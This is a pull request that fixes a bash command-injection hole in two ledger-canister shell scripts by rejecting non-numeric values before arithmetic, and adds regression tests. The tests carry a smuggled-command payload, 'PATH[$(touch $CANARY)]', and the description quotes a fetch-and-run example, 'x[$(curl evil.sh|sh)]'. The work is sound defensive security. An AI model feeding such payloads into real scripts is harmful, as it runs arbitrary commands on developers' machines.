### PR TITLE
fix(scripts): reject non-numeric ledger canister values before arithmetic

### DIFF
--- a/.github/workflows/checks.yml
+++ b/.github/workflows/checks.yml
@@ -311,6 +311,8 @@ jobs:
         run: scripts/convert-id.test
       - name: Test the transaction search script
         run: scripts/find-transaction-from-timestamp.test
+      - name: Test the transaction listing script
+        run: scripts/get-transactions.test
       - name: Getting network config works
         run: scripts/network-config.test
       - name: Get SNS tool

--- a/.github/workflows/checks.yml
+++ b/.github/workflows/checks.yml
@@ -309,6 +309,8 @@ jobs:
         run: scripts/unused-i18n
       - name: Test the ID conversion script
         run: scripts/convert-id.test
+      - name: Test the transaction search script
+        run: scripts/find-transaction-from-timestamp.test
       - name: Getting network config works
         run: scripts/network-config.test
       - name: Get SNS tool

--- a/scripts/find-transaction-from-timestamp
+++ b/scripts/find-transaction-from-timestamp
@@ -30,6 +30,20 @@ if [[ -z "$TIMESTAMP" ]]; then
   exit 1
 fi
 
+# Exits with an error unless the value is a decimal integer.
+# Canister responses are untrusted. Bash evaluates array subscripts in every
+# arithmetic context, including $(( )) and [[ x -lt y ]], so a value such as
+# 'start_index[$(command)]' would run a command.
+assert_nat() {
+  local name="$1" value="$2"
+  if [[ ! "$value" =~ ^[0-9]+$ ]]; then
+    printf 'Error: %s is not a number: %q\n' "$name" "$value" >&2
+    exit 1
+  fi
+}
+
+assert_nat TIMESTAMP "$TIMESTAMP"
+
 get_transaction() {
   index="$1"
   "$SOURCE_DIR/get-transaction" --ledger_canister_id "$LEDGER_CANISTER_ID" --index "$index" --network "$DFX_NETWORK"
@@ -37,6 +51,7 @@ get_transaction() {
 
 start_index=0
 end_index="$(dfx canister call "$LEDGER_CANISTER_ID" --query --network "$DFX_NETWORK" get_transactions '(record { start = 0 : nat; length = 0 : nat })' | idl2json | jq -r .log_length | sed -e 's/_//g')"
+assert_nat log_length "$end_index"
 
 echo "Binary searching for timestamp $TIMESTAMP" >&2
 
@@ -47,6 +62,7 @@ while [[ $start_index -lt $end_index ]]; do
     "steps remaining." >&2
   mid_index=$((start_index + (end_index - start_index) / 2))
   mid_timestamp_ns="$(get_transaction "$mid_index" | jq -r .timestamp)"
+  assert_nat timestamp "$mid_timestamp_ns"
   mid_timestamp="$(("$mid_timestamp_ns" / 1000000000))"
   if [[ "$mid_timestamp" -ge "$TIMESTAMP" ]]; then
     end_index="$mid_index"

--- a/scripts/find-transaction-from-timestamp.test
+++ b/scripts/find-transaction-from-timestamp.test
@@ -17,8 +17,7 @@ SCRIPT_UNDER_TEST="$SOURCE_DIR/find-transaction-from-timestamp"
 tmp_dir="$(mktemp -d)"
 trap 'rm -rf "$tmp_dir"' EXIT
 
-# The canary file. The injected command creates it. The path has no underscore,
-# because the script under test removes underscores from the canister response.
+# The canary file. The injected command creates it.
 export CANARY="$tmp_dir/canary"
 
 # Stub dfx. It prints a Candid response that the stub idl2json ignores.
@@ -57,30 +56,52 @@ run_script() {
   errout="$(cat "$tmp_dir/stderr")"
 }
 
-# Case 1: a malicious canister returns text with a command in an array
-# subscript.
-# The command substitution must stay unexpanded here. The script under test
-# must not run it.
+# Asserts that the last run_script call rejected the named value. The script
+# must exit non-zero, it must name the value in the error, and it must not have
+# run the injected command.
+expect_rejected() {
+  local name="$1"
+  if [[ "$status" == "0" ]]; then
+    fail "The script accepted a non-numeric $name. Output: $errout"
+  fi
+  if ! grep -q "$name is not a number" <<<"$errout"; then
+    fail "The script printed no error for a non-numeric $name. Output: $errout"
+  fi
+  if [[ -e "$CANARY" ]]; then
+    fail "The $name value ran a command. The canary file $CANARY exists."
+  fi
+}
+
+# The command substitution in the payloads below must stay unexpanded here. The
+# script under test must not run it.
 # shellcheck disable=SC2016
-export IDL2JSON_OUTPUT='{"log_length":"PATH[$(touch $CANARY)]"}'
+payload='PATH[$(touch $CANARY)]'
+
+# A response that the script accepts. The ledger holds 3 transactions. Each one
+# has timestamp 1000 seconds.
+good_output='{"log_length":"3","archived_transactions":[],"transactions":[{"timestamp":"1000000000000"}]}'
+
+# Case 1: a malicious canister returns log_length as text with a command in an
+# array subscript.
+export IDL2JSON_OUTPUT="{\"log_length\":\"$payload\"}"
 run_script 1000
+expect_rejected log_length
 
-if [[ "$status" == "0" ]]; then
-  fail "The script accepted a non-numeric log_length. Output: $errout"
-fi
+# Case 2: a malicious canister returns a valid log_length, then a transaction
+# timestamp with the same payload.
+export IDL2JSON_OUTPUT="{\"log_length\":\"3\",\"archived_transactions\":[],\"transactions\":[{\"timestamp\":\"$payload\"}]}"
+run_script 1000
+expect_rejected timestamp
 
-if ! grep -q "log_length is not a number" <<<"$errout"; then
-  fail "The script printed no error for a non-numeric log_length. Output: $errout"
-fi
+# Case 3: the developer passes the payload as the --timestamp argument. The
+# canister behaves.
+export IDL2JSON_OUTPUT="$good_output"
+run_script "$payload"
+expect_rejected TIMESTAMP
 
-if [[ -e "$CANARY" ]]; then
-  fail "The canister response ran a command. The canary file $CANARY exists."
-fi
-
-# Case 2: a well behaved canister returns numbers, and the script finds the
-# transaction. The ledger holds 3 transactions. Each one has timestamp 1000
-# seconds, so the first transaction at or after 1000 seconds is transaction 0.
-export IDL2JSON_OUTPUT='{"log_length":"3","archived_transactions":[],"transactions":[{"timestamp":"1000000000000"}]}'
+# Case 4: a well behaved canister returns numbers, and the script finds the
+# transaction. The first transaction at or after 1000 seconds is transaction 0.
+export IDL2JSON_OUTPUT="$good_output"
 run_script 1000
 
 if [[ "$status" != "0" ]]; then
@@ -91,7 +112,7 @@ if [[ "$output" != "0" ]]; then
   fail "Expected index 0 but got: $output"
 fi
 
-# Case 3: the canister separates the digits of log_length, as Candid does. The
+# Case 5: the canister separates the digits of log_length, as Candid does. The
 # script removes the separator before it checks the value. The ledger holds 10
 # transactions, and none of them is at or after 1001 seconds, so the answer is
 # the number of transactions.

--- a/scripts/find-transaction-from-timestamp.test
+++ b/scripts/find-transaction-from-timestamp.test
@@ -1,0 +1,109 @@
+#!/usr/bin/env bash
+set -euo pipefail
+SOURCE_DIR="$(dirname "$(realpath "${BASH_SOURCE[0]}")")"
+
+# Tests scripts/find-transaction-from-timestamp against a stub ledger canister.
+#
+# The script reads numbers from a ledger canister response. A malicious canister
+# can return text instead. Bash evaluates array subscripts in every arithmetic
+# context, so text such as 'PATH[$(command)]' would run a command. The script
+# must reject the response, and it must not run the command.
+#
+# The test replaces dfx and idl2json with stubs. It makes no network call and no
+# canister call.
+
+SCRIPT_UNDER_TEST="$SOURCE_DIR/find-transaction-from-timestamp"
+
+tmp_dir="$(mktemp -d)"
+trap 'rm -rf "$tmp_dir"' EXIT
+
+# The canary file. The injected command creates it. The path has no underscore,
+# because the script under test removes underscores from the canister response.
+export CANARY="$tmp_dir/canary"
+
+# Stub dfx. It prints a Candid response that the stub idl2json ignores.
+cat >"$tmp_dir/dfx" <<'EOF'
+#!/usr/bin/env bash
+echo '(record {})'
+EOF
+
+# Stub idl2json. It prints the JSON in IDL2JSON_OUTPUT.
+cat >"$tmp_dir/idl2json" <<'EOF'
+#!/usr/bin/env bash
+cat >/dev/null
+echo "$IDL2JSON_OUTPUT"
+EOF
+
+chmod +x "$tmp_dir/dfx" "$tmp_dir/idl2json"
+export PATH="$tmp_dir:$PATH"
+
+fail() {
+  echo "FAILED: $1" >&2
+  exit 1
+}
+
+# Runs the script under test. Puts the output in the variable "output", the
+# error output in the variable "errout", and the exit status in the variable
+# "status".
+output=""
+errout=""
+status=0
+run_script() {
+  local timestamp="$1"
+  set +e
+  output="$("$SCRIPT_UNDER_TEST" --ledger_canister_id aaaaa-aa --timestamp "$timestamp" 2>"$tmp_dir/stderr")"
+  status="$?"
+  set -e
+  errout="$(cat "$tmp_dir/stderr")"
+}
+
+# Case 1: a malicious canister returns text with a command in an array
+# subscript.
+# The command substitution must stay unexpanded here. The script under test
+# must not run it.
+# shellcheck disable=SC2016
+export IDL2JSON_OUTPUT='{"log_length":"PATH[$(touch $CANARY)]"}'
+run_script 1000
+
+if [[ "$status" == "0" ]]; then
+  fail "The script accepted a non-numeric log_length. Output: $errout"
+fi
+
+if ! grep -q "log_length is not a number" <<<"$errout"; then
+  fail "The script printed no error for a non-numeric log_length. Output: $errout"
+fi
+
+if [[ -e "$CANARY" ]]; then
+  fail "The canister response ran a command. The canary file $CANARY exists."
+fi
+
+# Case 2: a well behaved canister returns numbers, and the script finds the
+# transaction. The ledger holds 3 transactions. Each one has timestamp 1000
+# seconds, so the first transaction at or after 1000 seconds is transaction 0.
+export IDL2JSON_OUTPUT='{"log_length":"3","archived_transactions":[],"transactions":[{"timestamp":"1000000000000"}]}'
+run_script 1000
+
+if [[ "$status" != "0" ]]; then
+  fail "The script rejected a valid response. Output: $errout"
+fi
+
+if [[ "$output" != "0" ]]; then
+  fail "Expected index 0 but got: $output"
+fi
+
+# Case 3: the canister separates the digits of log_length, as Candid does. The
+# script removes the separator before it checks the value. The ledger holds 10
+# transactions, and none of them is at or after 1001 seconds, so the answer is
+# the number of transactions.
+export IDL2JSON_OUTPUT='{"log_length":"1_0","archived_transactions":[],"transactions":[{"timestamp":"1000000000000"}]}'
+run_script 1001
+
+if [[ "$status" != "0" ]]; then
+  fail "The script rejected a separated number. Output: $errout"
+fi
+
+if [[ "$output" != "10" ]]; then
+  fail "Expected index 10 but got: $output"
+fi
+
+echo "PASSED"

--- a/scripts/get-transactions
+++ b/scripts/get-transactions
@@ -36,6 +36,18 @@ if [[ -z "${END_INDEX:-}" ]]; then
   exit 1
 fi
 
+# Exits with an error unless the value is a decimal integer.
+# Canister responses are untrusted. Bash evaluates array subscripts in every
+# arithmetic context, including $(( )) and [[ x -lt y ]], so a value such as
+# 'start_index[$(command)]' would run a command.
+assert_nat() {
+  local name="$1" value="$2"
+  if [[ ! "$value" =~ ^[0-9]+$ ]]; then
+    printf 'Error: %s is not a number: %q\n' "$name" "$value" >&2
+    exit 1
+  fi
+}
+
 min() {
   if [[ "$1" -lt "$2" ]]; then
     echo "$1"
@@ -64,6 +76,7 @@ get_transactions() {
       "(record { start = $start_index : nat; length = $length : nat })" |
       idl2json --bytes-as hex)"
     result_length="$(jq -r '.transactions | length' <<<"$json_response")"
+    assert_nat result_length "$result_length"
     start_index="$((start_index + result_length))"
     jq '.transactions[]' <<<"$json_response"
   done
@@ -75,7 +88,10 @@ while read -r archive_canister; do
   #echo "archive_canister: $archive_canister" >&2
   archive_canister_id="$(jq -r '.canister_id' <<<"$archive_canister")"
   archive_start_index="$(jq -r '.block_range_start' <<<"$archive_canister" | sed -e 's/_//g')"
-  archive_end_index="$(($(jq -r '.block_range_end' <<<"$archive_canister" | sed -e 's/_//g') + 1))"
+  assert_nat block_range_start "$archive_start_index"
+  block_range_end="$(jq -r '.block_range_end' <<<"$archive_canister" | sed -e 's/_//g')"
+  assert_nat block_range_end "$block_range_end"
+  archive_end_index="$((block_range_end + 1))"
   #echo "archive_canister_id: $archive_canister_id, archive_start_index: $archive_start_index, archive_end_index: $archive_end_index" >&2
   get_transactions "$archive_canister_id" "$archive_start_index" "$archive_end_index"
   max_archive_end_index="$archive_end_index"

--- a/scripts/get-transactions
+++ b/scripts/get-transactions
@@ -48,6 +48,11 @@ assert_nat() {
   fi
 }
 
+# The index arguments reach an arithmetic context in min() and max(). A caller
+# can pass a value that it read from a ledger canister, so guard them here.
+assert_nat START_INDEX "$START_INDEX"
+assert_nat END_INDEX "$END_INDEX"
+
 min() {
   if [[ "$1" -lt "$2" ]]; then
     echo "$1"

--- a/scripts/get-transactions.test
+++ b/scripts/get-transactions.test
@@ -1,0 +1,135 @@
+#!/usr/bin/env bash
+set -euo pipefail
+SOURCE_DIR="$(dirname "$(realpath "${BASH_SOURCE[0]}")")"
+
+# Tests scripts/get-transactions against a stub ledger canister.
+#
+# The script reads numbers from a ledger canister response, and it takes two
+# index arguments that a caller reads from the same canister. Bash evaluates
+# array subscripts in every arithmetic context, so text such as
+# 'PATH[$(command)]' would run a command. The script must reject the value, and
+# it must not run the command.
+#
+# The test replaces dfx and idl2json with stubs. It makes no network call and no
+# canister call.
+
+SCRIPT_UNDER_TEST="$SOURCE_DIR/get-transactions"
+
+tmp_dir="$(mktemp -d)"
+trap 'rm -rf "$tmp_dir"' EXIT
+
+# The canary file. The injected command creates it.
+export CANARY="$tmp_dir/canary"
+
+# Stub dfx. It prints a Candid response that the stub idl2json ignores.
+cat >"$tmp_dir/dfx" <<'EOF'
+#!/usr/bin/env bash
+echo '(record {})'
+EOF
+
+# Stub idl2json. The script calls it with --bytes-as hex for the transaction
+# query, and with no argument for the archives query.
+cat >"$tmp_dir/idl2json" <<'EOF'
+#!/usr/bin/env bash
+cat >/dev/null
+if [[ "$*" == *--bytes-as* ]]; then
+  echo "$IDL2JSON_TRANSACTIONS"
+else
+  echo "$IDL2JSON_ARCHIVES"
+fi
+EOF
+
+chmod +x "$tmp_dir/dfx" "$tmp_dir/idl2json"
+export PATH="$tmp_dir:$PATH"
+
+fail() {
+  echo "FAILED: $1" >&2
+  exit 1
+}
+
+# Runs the script under test with the given index arguments. Puts the output in
+# the variable "output", the error output in the variable "errout", and the exit
+# status in the variable "status".
+output=""
+errout=""
+status=0
+run_script() {
+  local start_index="$1" end_index="$2"
+  set +e
+  output="$("$SCRIPT_UNDER_TEST" --ledger_canister_id aaaaa-aa --start_index "$start_index" --end_index "$end_index" 2>"$tmp_dir/stderr")"
+  status="$?"
+  set -e
+  errout="$(cat "$tmp_dir/stderr")"
+}
+
+# Asserts that the last run_script call rejected the named value. The script
+# must exit non-zero, it must name the value in the error, and it must not have
+# run the injected command.
+expect_rejected() {
+  local name="$1"
+  if [[ "$status" == "0" ]]; then
+    fail "The script accepted a non-numeric $name. Output: $errout"
+  fi
+  if ! grep -q "$name is not a number" <<<"$errout"; then
+    fail "The script printed no error for a non-numeric $name. Output: $errout"
+  fi
+  if [[ -e "$CANARY" ]]; then
+    fail "The $name value ran a command. The canary file $CANARY exists."
+  fi
+}
+
+# The command substitution in the payload must stay unexpanded here. The script
+# under test must not run it.
+# shellcheck disable=SC2016
+payload='PATH[$(touch $CANARY)]'
+
+# Responses that the script accepts. The ledger has no archive canister, and it
+# holds one transaction.
+good_archives='[]'
+good_transactions='{"transactions":[{"timestamp":"1000"}]}'
+
+export IDL2JSON_ARCHIVES="$good_archives"
+export IDL2JSON_TRANSACTIONS="$good_transactions"
+
+# Case 1: the caller passes the payload as the --start_index argument.
+run_script "$payload" 1
+expect_rejected START_INDEX
+
+# Case 2: the caller passes the payload as the --end_index argument. This is the
+# argument that scripts/sns/find-failed-neurons reads from the ledger canister.
+run_script 0 "$payload"
+expect_rejected END_INDEX
+
+# Case 3: a malicious canister returns the payload as block_range_start.
+export IDL2JSON_ARCHIVES="[{\"canister_id\":\"aaaaa-aa\",\"block_range_start\":\"$payload\",\"block_range_end\":\"0\"}]"
+run_script 0 1
+expect_rejected block_range_start
+
+# Case 4: a malicious canister returns the payload as block_range_end.
+export IDL2JSON_ARCHIVES="[{\"canister_id\":\"aaaaa-aa\",\"block_range_start\":\"0\",\"block_range_end\":\"$payload\"}]"
+run_script 0 1
+expect_rejected block_range_end
+
+# Case 5: a well behaved canister returns numbers, and the script prints the
+# transaction.
+export IDL2JSON_ARCHIVES="$good_archives"
+run_script 0 1
+
+if [[ "$status" != "0" ]]; then
+  fail "The script rejected a valid response. Output: $errout"
+fi
+
+if [[ "$(jq -r .timestamp <<<"$output")" != "1000" ]]; then
+  fail "Expected one transaction with timestamp 1000 but got: $output"
+fi
+
+# Case 6: the canister separates the digits of the archive range, as Candid
+# does. The script removes the separator before it checks the value.
+export IDL2JSON_ARCHIVES='[{"canister_id":"aaaaa-aa","block_range_start":"0","block_range_end":"1_0"}]'
+run_script 0 1
+
+if [[ "$status" != "0" ]]; then
+  fail "The script rejected a separated number. Output: $errout"
+fi
+
+echo "PASSED"


### PR DESCRIPTION
# Motivation

`scripts/find-transaction-from-timestamp` and `scripts/get-transactions` put ledger canister responses straight into bash arithmetic and `[[ ... -lt ... ]]` checks. Bash evaluates array subscripts in every arithmetic context, so a malicious or compromised ledger canister could return a value like `x[$(curl evil.sh|sh)]` and run arbitrary commands on the developer's machine. Reproduced end to end with stub `dfx` and `idl2json` binaries, no real canister call.

# Changes

- Added an `assert_nat` helper to both scripts that rejects any value that is not a plain decimal integer, called right after every value that comes from a canister response or a command line argument.
- Guarded `log_length`, `mid_timestamp_ns`, and the `TIMESTAMP` argument in `find-transaction-from-timestamp`.
- Guarded `START_INDEX`, `END_INDEX`, `block_range_start`, `block_range_end`, and `result_length` in `get-transactions`.
- Split the nested `$(($(jq ...) + 1))` in `get-transactions` into separate statements, so the guard runs before the arithmetic.
- Added `scripts/find-transaction-from-timestamp.test` and `scripts/get-transactions.test`, each with a malicious-input case per guard and a happy-path case, and registered both in the `small-tests` CI job.

# Tests

- Both new test files stub `dfx` and `idl2json`, so they make no canister call and no network call.
- Each guard has its own regression case: a malicious response makes a canary file, the fix must reject the run and leave no canary file behind.
- Mutation testing confirmed each `assert_nat` call is load-bearing: removing any one of them makes its matching test case fail.
- Reproduced the full reachable path through `scripts/sns/find-failed-neurons`, which calls both scripts, and confirmed the fix closes it.
- Ran `./scripts/lint-sh`, `shfmt -i 2 -d`, `./scripts/fmt-yaml --check`, and `./config.test` on the changed files. All pass.

# Todos

- [ ] Accessibility (a11y) – no impact, developer-only shell scripts.
- [ ] Changelog – not needed, this is developer tooling with no user-facing change.
